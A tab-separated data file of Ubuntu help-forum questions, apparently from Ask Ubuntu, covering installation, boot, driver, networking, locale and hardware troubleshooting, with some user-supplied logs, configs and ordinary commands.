421787	change directory	i 'm trying to adb up and going but having a bit of a hard time . i 'm not a noob by any means when it comes linux . in order to install android sdk tools i need to change directory and this is what im having a hard time doing . here is what i 'm getting in the terminal : kendall @ kendall-thinkpad-t420 : ~ $ cd /downloads/android-sdk-linux/tools bash : cd : /downloads/android-sdk-linux/tools : no such file or directory kendall @ kendall-thinkpad-t420 : ~ $ what am i doing wrong ?
421790	`` read error '' while booting after ubuntu 13 installation	i get an `` read error '' message while system is booting ( ubuntu 13 ) after fresh install using default settings . probably there is something wrong with grub , but during the instalation process i choose option to clear entire disk and install ubuntu only . before installing ubuntu there was windows 7 on the disk . hdd is clear , any damages , bad sectors etc . i 've tried with `` boot-repair '' , but without any success.. there is an log : http : //paste.ubuntu.com/6945250/ any suggestions ?
421792	i did n't found how or is it possible to install maya on a 32-bit ubuntu ?	i need to know how i can install maya ( any possible version ) on a 32-bit ubuntu ! ! .thanks
421793	ubuntu server strange locale issue	installed brand new ubuntu 13.10 64 bit on hetzner server . right after install tried to execute apt-get update and apt-get dist-upgrade . getting following error nearly on all apt-get operation perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory googled a lot and tried a lot of solutions . no success . still same warnings . very annoying and do n't know what 's stand behind .
421794	trying to install ubuntu from usb	i 'm trying to install ubuntu 12.04 lts on my notebook . i have ubuntu 11.10 , and my cd reader does n't work , so i wanted to do it from my kingstong datatraveler 100 . i have an intel i5 in my computer . the thing is that when i try to run the usb the system tells me that there is an error in the usb , tells me to press any key to continue , and then it enters to the os . the data traveler is new , and it works fine , i 've already saved some files , and the .iso in it to install ubuntu from it . what am i doing wrong ?
421796	how do i install/use the fglrx-installer ?	i tried updating my graphics card using the additional drivers but that didnât work , nothing showed up . i tried installing it using the graphics card driver made by amd but that just broke my computer and had to do a fresh install ( it seems there was an error while installing the driver .-. ) . now iâm trying to install the fglrx-installer but i ca n't find any tutorials on the internet . by the way , i have a ati radeon hd 3100 graphics card . could anyone help me please ?
421797	installing generic headers without internet in ubuntu 13.04	i tried to install generic linux headers without internet by downloading them in .deb formats .. based on the dependencies i installed one by one , then i encountered this .libc6 : i386 depends on libgcc1 ; and libgcc1 : i386 depends on libc6 ( > = 2.2.4 ) ; .. **these two dependencies are cyclic** and i am unable to resolve them .. sudo dpkg -i libc6_2.17-0ubuntu5.1_i386.deb ( reading database ... 180653 files and directories currently installed . ) preparing to replace libc6 : i386 2.17-0ubuntu5.1 ( using libc6_2.17-0ubuntu5.1_i386.deb ) ... unpacking replacement libc6 : i386 ... dpkg : dependency problems prevent configuration of libc6 : i386 : **libc6 : i386 depends on libgcc1 ; however : package libgcc1 : i386 is not configured yet . ** dpkg : error processing libc6 : i386 ( -- install ) : dependency problems - leaving unconfigured errors were encountered while processing : libc6 : i386 jv @ jv-naruto : ~/downloads/sdsd $ sudo dpkg -i libgcc1_4.7.3-1ubuntu1_i386.deb ( reading database ... 180653 files and directories currently installed . ) preparing to replace libgcc1 : i386 1:4.7.3-1ubuntu1 ( using libgcc1_4.7.3-1ubuntu1_i386.deb ) ... unpacking replacement libgcc1 : i386 ... dpkg : dependency problems prevent configuration of libgcc1 : i386 : **libgcc1 : i386 depends on libc6 ( > = 2.2.4 ) ; however : package libc6 : i386 is not configured yet . ** suggestions ?
421798	touchpad indicator troubles	i installed the touchpad-indicator as follows : sudo add-apt repository ppa : atareao/atareao sudo apt-get update sudo apt-get install touchpad-indicator i can make adjustments , such as temporary disable when typing , but i can not toggle disable/enable via keyboard short cut [ ctr+alt+c ] - i 've tried changing the character from 'c ' to other characters . also , i do not get the pop-up telling me the touchpad has been enabled or disabled . as a writer new to ubuntu , i really need for quick toggling of the touchpad ... if not with touchapd-indicator , than any other suggestions ?
421800	unable to switch desktop environments in 13.10	i have unity , kde ( kubuntu ) , and gnome installed in 13.10 . all three show up in the drop down when i go to switch users/login ; kde plasma workspace is the default option . i 've tried lightdm , gdm , and kdm display managers . no matter what i do or how i select the desired desktop environment , my system always , always , always boots into unity . ( it did boot into kde once and only once . after that i 've never been able to get back into kde . ) i 've tried everything that i could find in askubuntu except for some , like the ones that to tab to a nonexistent ok button in the drop down list of environments . i 've tried removing and reinstalling kde . i 've tried changing display managers . i 've tried doing a full restart as opposed to switching users . does anyone have any idea how i can switch to a different desktop environment , other than unity , without ditching my current installation totally and completely reinstalling ubuntu ?
421801	when i installed ubuntu 13.10 my ethernet is not connecting	i have just installed ubuntu 13.10 on a new computer i put together however i am unable to get my ethernet to work . what happens is my computer will go through phases of searching for a network and then occasionally pop a red box that says you are disconnected from the network . here are the results of my ifconfig : eth1 link encap : ethernet hwaddr 74 : d4:35:58 : b2:47 inet6 addr : fe80 : :76d4:35ff : fe58 : b247/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:713 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:1034 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:53473 ( 53.4 kb ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:80 errors:0 dropped:0 overruns:0 frame:0 tx packets:80 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:6272 ( 6.2 kb ) tx bytes:6272 ( 6.2 kb ) any help i can get would be greatly appreciated . thanks edit : after looking over my config i appear to have an ipv6 address . and i know for a fact that this particular network is n't configured to hand out ipv6 addresses ( its a private home network )
421802	how to establish a favorite wlan on ubuntu ?	i have two networks in my house and i really need two : one with and one without internet . the problem is that every time i turn on my computer it connects to the network without internet . i wanted to know if there is any way to set it to always connect to the internet . thanks a lot , g .
421804	command line productivity	i am not sure if this question is off-topic but since i am a pretty new user to ubuntu ( and also , still a user of windows 7 ) i am becoming more and more used to the terminal , that is so powerful on ubuntu . most of the things on ubuntu i learnt doing only on the terminal . my question is more related to the hci part of ubuntu : i was wondering : how productive are we when we use the command line ? i mean , the mouse seems like a pretty efficient device and having windows-style interfaces seems to me like the fastest way to get thing done . i know that we can still use the mouse on the terminal but obviously the terminal is not using its full potential . i am not sure if i feel like this because i 've been using windows for over 20 years or for some other reason ... if anyone has a link to some research about this topic that would be excellent !
421805	how to set up dial-up and vnp on ubuntu ?	i was n't able to find a way to make my connection work on ubuntu . it 's not an usual type of connection so i was not able to find in anywhere . for me to be able to use this type of internet connection i have to be connected to wireless `` zone gvozdac '' ( done that ) .after i 'm connected to that i need to connect to an dial-up/vnp connection.on windows you only have to type 3 things : -system name ( display name or whatever it 's called ) -username -password hope i hear from you soon . [ right ] ~chears [ /right ]
421807	how can i run `` apt-get install '' in the background ?	when i try to install a package , for instance nsnake , with the command sudo apt-get install nsnake & , the process immediately stops . i can bring it to the foreground and enter my sudo password , pause it ( with ctrl-z ) , and send it back to the background again . but then the shell will immediately pause the process , e.g. , katriel @ caseylaptop : ~ $ bg [ 2 ] + sudo apt-get install nsnake & [ 2 ] + stopped sudo apt-get install nsnake is it possible to install packages in the background ? i may want to do this while installing large packages on a computer i 'm ssh'ing into .
421812	how to add text effects in gimp 2.8 ?	is there any text effects option for gimp 2.8 ? like add material , fire , glow etc or even simpler ones like gradient or different colours in same letter . i am open to add as many text effects plugins as possible . it will be nice if i can do this through terminal .
421818	web developer tools in midori web browser	this might not be the best place , but here i go . i am thinking of switching to midori web browser , as it is lighter than chromium/chrome/firefox . currently i am struggling to find any web-dev tools for it . any web-developer toolset for midori web browser ? i am looking for something similar to ff - firebug or chrome - developer tools thanks !
421819	what font ubuntu uses	i was wondering what is the default for linux ubuntu , i really like it , could any one let me know what font it is ? thanks in advance .
421822	not saving profile	hi there i hope i 've used the right tag if not can you suggest another one please . anyway i 'm currently still a beginner with ubuntu and i 'm having problems with jstest-gtk . i 've installed jstest-gtk and i 've managed to setup my afterglow xbox 360 wired controller how i want , however when i go to save to profile it tells me it has saved it as `` profile 0 '' then i close the window but when i reopen jstest-gtk my profile is no longer in the drop down menu but my controller is still setup to how i want . when i restart my computer either from shut down or reboot my i have to setup my controller all over again and there is still no profiles saved in the drop down menu still . it is really annoying having to setup my controller every time i start ubuntu . if anyone can help i 'll truly grateful .
421825	how should one lock wine apps to the unity launcher ?	i have installed the rosetta stone language learning software successful with wine . when i click and drag the rosetta stone icon from the dash to the launcher , the other icons make way for it , but when i release the mouse button the icon does n't stay . how can i lock the application to the launcher ?
421830	problems working with broadcom 4352 wireless card	not sure if this is a duplicate of broadcom sta driver does n't work well with bcm4313 or not . it 's the same series i think but i 've seen no explicit reference to 4352 or 43xx ( implying it 's applicable for all 43xx series ) . canonical claims support for this card over here and when i booted into the live install cd it worked after enabling the driver in software-properties . admittingly i did n't use it enough to see if the connection was flaky . instead i booted into a server install usb and i 'm now attempting to configure it post install . my current procedure is to run this script , which is built from snippets i 've been reading about at various locations . conffile=/etc/wpa_supplicant.conf conf= $ ( cat < < confend ctrl_interface=dir=/var/run/wpa_supplicant group=wireless update_config=1 endconf ) echo `` $ conf '' | sudo tee $ conffile > /dev/null wpa_passphrase `` '' `` '' | sudo tee -a $ conffile > /dev/null sudo kill-all wpa_supplicant sudo wpa_supplicant -b -dwext -ieth0 -c $ conffile sudo dhclient eth0 now sometimes this runs in about 15 seconds , emits two errors ( ioctl [ siocsiwencodeext ] : invalid argument ) , but works fine . ca n't tell if the connection is flaky or i have selected a poor mirror in apt . however other times it takes > 5 minutes to run and emits no useful information before i kill it . i try to run the wpa_supplicant and dhclient lines by themselves and each take ages and report no useful errors . the end result in these cases is that iwconfig shows the interface as associated but ifconfig shows no ipv4 address and dhclient refuses to fetch one . here 's some debugging info : kernel log is full of these : feb 16 20:59:49 alpha kernel : [ 3680.237755 ] -- -- -- -- -- -- [ cut here ] -- -- -- -- -- - - feb 16 20:59:49 alpha kernel : [ 3680.237805 ] warning : cpu : 1 pid : 476 at /build/ buildd/linux-3.11.0/net/wireless/sme.c:795 cfg80211_roamed+0x89/0x90 [ cfg80211 ] ( ) feb 16 20:59:49 alpha kernel : [ 3680.237808 ] modules linked in : michael_mic arc4 snd_hda_codec_hdmi lib80211_crypt_tkip x86_pkg_temp_thermal coretemp wl ( pof ) kv m crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 lrw g f128mul glue_helper ablk_helper cryptd i915 snd_hda_codec_realtek joydev eeepc_w mi snd_hda_intel drm_kms_helper lib80211 asus_wmi snd_hda_codec sparse_keymap sn d_hwdep drm snd_pcm hid_generic snd_page_alloc snd_seq_midi snd_seq_midi_event c fg80211 snd_rawmidi i2c_algo_bit psmouse snd_seq snd_seq_device usbhid mei_me sn d_timer microcode mei hid serio_raw snd e1000e soundcore video ptp lpc_ich wmi p ps_core mac_hid lp parport ahci libahci feb 16 20:59:49 alpha kernel : [ 3680.237888 ] cpu : 1 pid : 476 comm : wl_event_handle tainted : pf w o 3.11.0-15-generic # 25-ubuntu feb 16 20:59:49 alpha kernel : [ 3680.237891 ] hardware name : asus all series/z87i-deluxe , bios 0702 08/30/2013 feb 16 20:59:49 alpha kernel : [ 3680.237895 ] 0000000000000009 ffff880210463d88 ffffffff816e7375 0000000000000000 feb 16 20:59:49 alpha kernel : [ 3680.237903 ] ffff880210463dc0 ffffffff81061dcd ffff88021436a000 ffff88020f4ad000 feb 16 20:59:49 alpha kernel : [ 3680.237909 ] 00000000000000a3 ffff880213223f00 0000000000000001 ffff880210463dd0 feb 16 20:59:49 alpha kernel : [ 3680.237916 ] call trace : feb 16 20:59:49 alpha kernel : [ 3680.237930 ] [ < ffffffff816e7375 > ] dump_stack+0x45/0x56 feb 16 20:59:49 alpha kernel : [ 3680.237942 ] [ < ffffffff81061dcd > ] warn_slowpath_common+0x7d/0xa0 feb 16 20:59:49 alpha kernel : [ 3680.237949 ] [ < ffffffff81061eaa > ] warn_slowpath_null+0x1a/0x20 feb 16 20:59:49 alpha kernel : [ 3680.237975 ] [ < ffffffffa01c4409 > ] cfg80211_roamed+0x89/0x90 [ cfg80211 ] feb 16 20:59:49 alpha kernel : [ 3680.238056 ] [ < ffffffffa0862ea5 > ] wl_bss_connect_done.isra.21+0x105/0x1b0 [ wl ] feb 16 20:59:49 alpha kernel : [ 3680.238124 ] [ < ffffffffa086314c > ] wl_notify_connect_status+0x1fc/0x410 [ wl ] feb 16 20:59:49 alpha kernel : [ 3680.238189 ] [ < ffffffffa0862445 > ] wl_event_handler+0x55/0x1f0 [ wl ] feb 16 20:59:49 alpha kernel : [ 3680.238253 ] [ < ffffffffa08623f0 > ] ? wl_cfg80211_scan+0x350/0x350 [ wl ] ifconfig ( when the script works ) eth0 link encap : ethernet hwaddr 24:0a:64:31:13:1b inet addr:192.168.1.105 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :260a:64ff : fe31:131b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:652 errors:0 dropped:1 overruns:0 frame:259012 tx packets:493 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:83037 ( 83.0 kb ) tx bytes:69997 ( 69.9 kb ) interrupt:19 iwconfig ( again , when it works ) eth0 ieee 802.11abg essid : '' '' mode : managed frequency:2.412 ghz access point : 58:6d:8f:7e:7a:77 bit rate=130 mb/s tx-power=200 dbm retry long limit:7 rts thr : off fragment thr : off encryption key : off power management : off link quality=58/70 signal level=-52 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:0 missed beacon:0 lshw *-network description : wireless interface product : bcm4352 802.11ac wireless network adapter vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 03 serial : 24:0a:64:31:13:1b width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.30.223.141 ( r415941 ) ip=192.168.1.105 latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:19 memory : f7a00000-f7a07fff memory : f7800000-f79fffff wpa_supplicant -h ( supported drivers ) drivers : wext = linux wireless extensions ( generic ) nl80211 = linux nl80211/cfg80211 wired = wired ethernet driver none = no driver ( radius server/wps er ) lspci -nn -d 14e4 : 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4352 802.11ac wireless network adapter [ 14e4:43b1 ] ( rev 03 ) sudo cat /etc/network/interfaces | grep -ev '^ # ' auto lo iface lo inet loopback auto em1 iface em1 inet dhcp auto eth0 iface eth0 inet dhcp edit : added extra diagnostic info
421832	sudo part of tutorial for bootable usb	i 've been trying to create a boo-table usb stick with ubuntu on my macbook pro . i got to the part of the tutorial where it said to use the following command : sudo dd if=./target.dmg of=/store\ n\ go/disk1s1 bs=1m where target.dmg is the image file and store n go is the usb that has the identifier disk1s1 . i get the following error message : dd : /store n go/disk1s1 : no such file or directory what am i doing wrong ? the tutorial i 'm following .
421833	wubi issue with dualbooting from xp	hey i used wubi to install ubuntu on the same partition as my winxp but when i reboot ubuntu wont load and says something about `` wrong .ini or boot.ini loading c : \windows '' help please ?
421834	how to create text files with user execution bit set automatically	the closest i got was umask to change the default permissions set for files/folders . however , umask does n't seem to allow enabling the x bit for files : the base permissions for directories are 0777 ( rwxrwxrwx ) and for files they are 0666 ( rw-rw-rw- ) . reference i also saw this ask ubuntu post which makes sense , but still , umask clearly has an involvement in the issue , not just touch 's code , because when i change umask , touch 's results are affected ) . is there any way to create files with the execution bit set , at least for the user section ( ideally -rwx-r-x-r-x = 755 )
421836	how do i make an app run on startup with root privileges ?	i 'm trying to install a remote shutdown program on my machine , so i can shutdown it from my android tablet , and it needs root privileges to run successfully . i 'd rather not have to load it with root access every time i intend to do something where i will leave it . i 've set it to run on startup but it does n't load with root privileges so i need it to run on startup with root privileges . here 's the app i 'm using link ( and of course the companion app for my linux laptop ) my laptop runs ubuntu 13.10 and the tablet i 'm trying to use is the nexus 7 2013 if that 's of any use .
421839	ca n't get ubuntu to load from usb stick	i 'm massively new at this stuff , so please forgive me . but i 've just built a new pc . i 've downloaded a usb boot installer for ubuntu 12.04 . when i power on the pc with the stick in , it all seems to start off well . it gives me the option to install ubuntu which i choose . however , it starts to work then just hangs on a black screen . if it leave it even longer , it will say something about the system needing to run in low graphics mode . any help ! ? i have no cd drive on my build so need to get an os on there via usb . many thanks !
421840	mounting problems on 13.10	right after i upgraded to 13.10 my computer stopped being able to mount one of my hard drive partitions sda5 giving me this error report each time i try : error mounting system-managed device /dev/sda5 : command-line `mount `` /media/bass/data '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so this is a ntfs partition though i have the exact same problem with sda1 which is a fat32 recovery partion i do n't know if that is relevant but given that sda1 is mentioned in the above error report i just thought i 'd mention it . i seem to be able to mount sda5 ( though not sda1 for some reason ) when using root but i 'd like to be able to have the computer mount it on start up plus it causes problems on startup . anyone know how to fix this ? edit : contents of fstab : /etc/fstab : static file system information . use 'blkid ' to print the universally unique identifier for a device ; this may be used with uuid= as a more robust way to name devices that works even if disks are added and removed . see fstab ( 5 ) . / was on /dev/sda6 during installation uuid=67c53175-b9d4-452c-902b-c0d1f1e882d2 / ext4 errors=remount-ro 0 1 swap was on /dev/sda7 during installation uuid=ddcfa0ee-8263-4c33-b30d-a81bcf170156 none swap sw 0 0 /dev/disk/by-uuid/ba59-9dab /media/bass/data auto nosuid , nodev , nofail , x-gvfs-show 0 0 /dev/disk/by-uuid/10622f65622f4eb2 /media/bass/data auto nosuid , nodev , nofail , x-gvfs-show 0 0
421841	unable to boot to ubuntu after installation	pardon my ignorance . i have been to install ubuntu for hours . no matter what i do i can not boot to it after installation . i have tried the method of 'along side windows ' where it makes a partition for you and also as using a custom partition . research has shown me that i should download and burn and run boot repair . however , i have the killer e2200 gigabit ethernet controller and it cant be detected with the version of the kernel that boot repair uses . when i try to run it it says i need the internet and it fails . i currently have windows 8 installed . i just want to install and dual boot ubuntu as well . what do i do ?
421842	reinstalling windows after a ubuntu uninstall	so a couple weeks ago i installed ubuntu as the sole operating system on my desktop . it would n't let me set it up as a dual boot , so i did n't worry about it . i quickly realised that ubuntu was not for me , so i uninstalled it , put windows 8 on a flash drive , and now whenever i try to turn my computer on windows wo n't even boot . surely ubuntu caused this , as my computer was working perfectly before . what do i do ?
421844	how do i fix `` initctl : event failed '' error ?	the initial problem is that i accidentally broke some kde dependencies while removing wallpaper packages . finally got somewhere with apt-get , but now this . with a normal boot , ubuntu loading screen animation just goes on indefinitely . all i 've found on the web so far has to do with display drivers , but i did n't have any problems with that before . i do have networking from root shell . do n't know what other details are pertinent . any ideas ?
421846	boot ubuntu 13 from usb flash drive without software	can i boot ubuntu 13 64-bit with the iso installed on a usb flash drive ( 16gb ) ? if so , how ? thanks so much for your help !
421847	installing ubuntu with windows 8 - kernel panic unable to mount root fs	i 've attempted to follow several guides including this guide that links to this video . no matter what i do , i always get this error come up after the grub menu and i click either try ubuntu or instal ubuntu . nothing works . i have windows 8.1 64bit and am trying to instal ubuntu 12.04 64bit . in brief i did the following : burnt a 64bit copy of ubuntu 12.04 to a usb flash drive . created a 220gb partition on my hdd but did not format it ( unallocated ) . restarted windows 8 to get the uefi menu that allows you to boot from usb . gained access to the grub menu and attempted to `` try ubuntu '' have you had this before ? how did you fix it ? am i doing something seriously wrnog ?
421853	how to replace windows xp with ubuntu ?	i have found out that they will be phasing out windows xp which i currently use . my brother recommended i switch to ubuntu . firstly , my computer itself is ancient , around 10 years old , will i be able to use ubuntu ? my other questions include what happens if i download this and it does n't work ? what happens to xp if i do download ? yes , my questions may be simple to some , but i 'm just a little unsure of how all this works .
421859	unable to recognize sata wire usb	this is the specific product i purchased at best buy : http : //www.apricorn.com/products/not ... ta-wire-3.html i bought it in the hopes of recovering files from a laptop who 's screen was cracked . unfortunately when i plug in , it does n't automount . and i ca n't find it to mount manually either . all that i 've done : checked connections . the sata hard drive is connected firmly and clicks in naturally , as well as the usb . the port and usb are both 3.0 ( both are blue anyways ) . searched to see if it was simply incompatible with ubuntu , but found essentially nothing . i 'm currently using ubuntu 13.10 , but i have a dual-boot with windows 8 , tried to connect while using the windows os , but i had the same inability to detect the sata . i 'm concerned about a few things . primarily about the actual sata wire itself . i 've never used anything like this before , so i 'm unsure if i 've got the right wire for the job . when i look at the actual sata port there are these 4 pins on the hdd that look important , but nothing on the sata wire to connect to it . see here : here 's a few more pictures to explain what i mean about the 4 pins a little better . http : //imgur.com/a/ospbj fdisk -l gives this output ( whilst sata wire usb is connected to both my ubuntu laptop and my other hard drive ) : warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk doesn't support gpt . use gnu parted . disk /dev/sda : 16.0 gb , 16013942784 bytes 256 heads , 63 sectors/track , 1939 cylinders , total 31277232 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0c31e0cb device boot start end blocks id system /dev/sda1 1 4294967295 2147483647+ ee gpt warning : gpt ( guid partition table ) detected on '/dev/sdb ' ! the util fdisk doesn'tsupport gpt . use gnu parted . disk /dev/sdb : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0c31e0c8 device boot start end blocks id system /dev/sdb1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . also , if i simply can not get this to work properly , would anyone have any advice on how to get the data off this hard drive without going through geek squad bs ?
421860	is it better do upgrade system from existing ubuntu installation , or to install a fresh version ?	so far every time i have uninstalled a new version of ubuntu i have done a clean install of the system , and after that i have installed all programs all over again , but now i am thinking as i have a quite many programs installed currently on my ubuntu version : is it `` safe '' to update my version of ubuntu to the latest 13.10 or it is the best to use the 'old school ' way and to install a fresh installation and then try to install and transfer all data and programs that i had in previous version ? what is better option ?
421861	ancestry software availability	is there an application dealing with ancestry on ubuntu ? wine will not co-operate with family tree maker . if someone can point me in the right direction , i will be able to give windows the complete `` heave-ho '' .
421863	how can i force access my drives ?	for example if i have a cd , dvd or pen-drive inserted and the cd/usb icon wo n't appear in nautilus or in the media folder , how can i access it ? same with floppy drive . where can i find it and access it after i 've inserted a disk ?
421867	laptop speakers	i recently installed ubuntu 12.04 and sound will come out of headphones , but wo n't come out of my laptop speakers . headphones work . i have a new asus and already tried the first 2 solutions on this site : link did n't work and i am a nob to linux so i did n't want to do the further solution without knowing what i was doing .
421869	do-release-upgrade fails with `` could not calculate the upgrade ''	i 'm having trouble upgrading my macbook pro retina from 13.04 to 13.10 . any help is appreciated . /var/log/dist-upgrade/apt.log /var/log/dist-upgrade/main.log
421872	computer turns on and i get only a black screen - no bios , no login , nothing	apologies for the incoming wall of text . i recently installed ubuntu 13.10 on my computer which used to run windows 8.1 until it stopped working because of drivers or something . ubuntu installed fine and i was using it for a couple of days with no problems . well , i should n't say no problems , my data hard drive ( 1tb secondary drive ) was unable to mount on ubuntu and could n't be reformatted . when i tried to format the drive , i got an error saying something along the lines of the drive being unable to be mounted . when i reset my computer after reformatting the drive , my bios flash screen no longer showed up and i was taken directly to the ubuntu login screen . i then tried to use boot-repair based on the guide at https : //help.ubuntu.com/community/boot-repair i restarted my computer right after that and nothing ever showed up . i waited 5 minutes and nothing happened , so i turned off the computer and turned it back on to the same black screen . nothing is showing up when i turn on the computer . no bios , no login screen , nothing .
421877	does the epson perfection v600 photo scanner or v550 work with sane	before buying either the epson perfection v600 photo scanner or the epson perfection v550 , i would like to confirm from a person who has used either of these scanners under linux that they work with sane . the sane documentation may be out of date . the perfection v550 and v600 are listed as `` not supported '' . the model 500 appears to now be obsolete as the current model is now the 550 and it is not listed in sane . i would like to know , from a person who has used these scanners , if these scanners work with sane . as an alternative , epson does have a website for downloading linux drivers .
421878	terminal + ssh does n't display utf correctly	i have a remote server , to which i connect via ssh . on separate mac os and gentoo computers , when i connect to this server , unicode works fine . on my brand new ubuntu installation , i do n't see unicode on this server correctly and i ca n't seem to insert them correctly either . i have a file with a letter `` 탑 '' . when i less it locally , on ubuntu , in terminal , i see correct `` 탑 '' . when i less the same file on the aforementioned server via ssh , i see just < c5 > < be > - both in terminal and xterm . locale on the server shows me this lang=en_us.utf-8 language= lc_ctype= '' en_us.utf-8 '' lc_numeric=cs_cz.utf-8 lc_time=cs_cz.utf-8 lc_collate= '' en_us.utf-8 '' lc_monetary=cs_cz.utf-8 lc_messages= '' en_us.utf-8 '' lc_paper=cs_cz.utf-8 lc_name=cs_cz.utf-8 lc_address=cs_cz.utf-8 lc_telephone=cs_cz.utf-8 lc_measurement=cs_cz.utf-8 lc_identification=cs_cz.utf-8 lc_all= terminal has utf8 encoding ( and as i wrote , the unicode file is opened correctly when opened locally ) . what can be wrong ?
421883	could n't find matching glx visual ( nvidia geforce gt325m )	i installed ubuntu 12.04 on my asus x64j laptop . most things work fine but when i try to start a game it says could n't find matching glx visual . lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) 01:00.0 vga compatible controller : nvidia corporation gt216m [ geforce gt 325m ] ( rev a2 ) how can i see which of these graphic cards is used ? ( i think only the intel onboard graphics is used ) i installed via `` additional drivers '' the drivers : nvidia_304 , nvidia_304_updates , nvidia_331 and nvidia_331_updates . it tells me that they are activated but not used . but when i look under `` system informations '' then theres no graphic card found . /etc/x11/xorg.conf : # nvidia-xconfig : x configuration file generated by nvidia-xconfig # nvidia-xconfig : version 304.116 ( buildmeister @ swio-display-x86-rhel47-01 ) mon oct 28 21:46:08 pdt 2013 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` unknown '' modelname `` unknown '' horizsync 28.0 - 33.0 vertrefresh 43.0 - 72.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 subsection `` display '' depth 24 endsubsection endsection i also can open the nvidia-settings so it should work properly or ? can please someone help me with fixing the problem ?
421886	did i install from usb correctly ? ( blank screen when usb drive removed )	i created a usb of 12.04 lts using the procedure at http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-windows ( starting from a windows xp system ) . after trying the system a few times , ( no issues except performance ) , i rebooted and selected install , replacing the current system . at the end of the install , i was instructed to reboot . since the usb drive was still plugged in , i was surprised not to see an instruction to remove it , so as not to just boot from that drive again . there was no such instruction , so i just pulled out the drive . the screen went blank and the system was totally unresponsive . i forced power down and then back up . ubuntu ( now from the hard drive ) came up and seems ok , except for an issue with saving settings ( which i will document separately ) . was this the correct procedure and is the blank screen result as expected ?
421888	when making an ubuntu based distro how do i get newer versions of my distro appear in the update manager instead of newer versions of ubuntu appear	i 'm making my own distro as you know , but i would like to know when a new major version of my distro is released how to make it appear in the update manager and make it accualy update to the newer version of my ubuntu based distro . i would like to be able to do this for free , and my .iso files are around 1.3 - 1.4 gib .
421891	fontconfig error - `` out of memory ''	i am trying to launch the android studio on xubuntu . when i type ./studio.sh in terminal i get this error : fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 14 : out of memory fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 23 : out of memory fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 32 : out of memory but the android studio launches and it seems to work without any problems . why am i getting this error and how can i fix it ?
421894	screencast with avconv cuts off last 5 seconds of audio	i 'm trying to record a screencast using avconv ( installed from official repo ) . all seems to work ok , except one thing : always , the last 5 seconds from my mic audio are dropped from the final video . i use this command : avconv -f alsa -i pulse -f x11grab -r 10 -s 1366x768 -i :0.0 -c : a libmp3lame -q : a 9 -c : v libx264 `` $ home/screencast_001.mkv '' my output file is great , exactly as needed , except that always the last 5 seconds of audio is discarded . video is ok until the end . any hint about what can i do to fix it ? my system is ubuntu 12.04.4 lts 64 bits , all up to date .
421895	ubuntu server 12.04 hangs during install	i am trying to install ubuntu server 12.04 . the installation is currently hung at `` installing the base system '' at 6 % , and it says its `` retrieving locales ... '' what should i do ? i do n't want to corrupt my hdd or bootable usb flash drive , and it 's been stuck for a very long time ( close to 1 hour now ) . all help is appreciated !
421896	caps locks light not showing	i 've installed ubuntu on my mbp but when i press caps lock the green light on the caps lock button will not show . i ca n't tell when i have caps locks on because it wo n't turn on . what do i do to make the light show ?
421898	how to completely disable cairo-dock shortkeys ?	i want to disable ( not changing ) all the cairo-dock shorkeys ( i do not need it ) plus it cause some problems with other programs that use same shortkeys ... .anyway to do it ? environment : lubuntu based on ubuntu 13.10 .
421901	cgminer installation says missing shared library	i am trying to install and run cgminer for ubuntu 64bit . i keep getting an error that states that a shared library libudev0 is missing . i can get everything installed but this one piece . can anyone help ?
